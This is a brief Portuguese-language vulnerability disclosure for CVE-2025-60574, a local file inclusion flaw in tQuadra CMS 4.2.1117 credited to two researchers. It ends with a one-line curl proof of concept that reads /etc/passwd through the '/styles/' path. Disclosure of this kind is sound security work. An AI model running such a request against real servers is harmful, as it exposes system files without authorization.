
Exploit de prova de conceito para CVE-2025-60574, uma vulnerabilidade de Inclusão de Arquivo Local no tQuadra CMS 4.2.1117, permitindo a recuperação arbitrária de arquivos através de requisições GET manipuladas.
Stefano Andreatta & Jacopo Candido Augelli
Uma vulnerabilidade de Inclusão Local de Arquivos (LFI) foi identificada no tQuadra CMS 4.2.1117. O problema existe no caminho "/styles/", que não sanitiza adequadamente a entrada fornecida pelo usuário. Um atacante pode explorar isso enviando uma requisição GET maliciosa para recuperar arquivos arbitrários do sistema subjacente.
Descobridores: Stefano Andreatta & Jacopo Candido Augelli
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
curl -s https://vulnerable.site.com/styles//etc/passwd --output - | gunzip
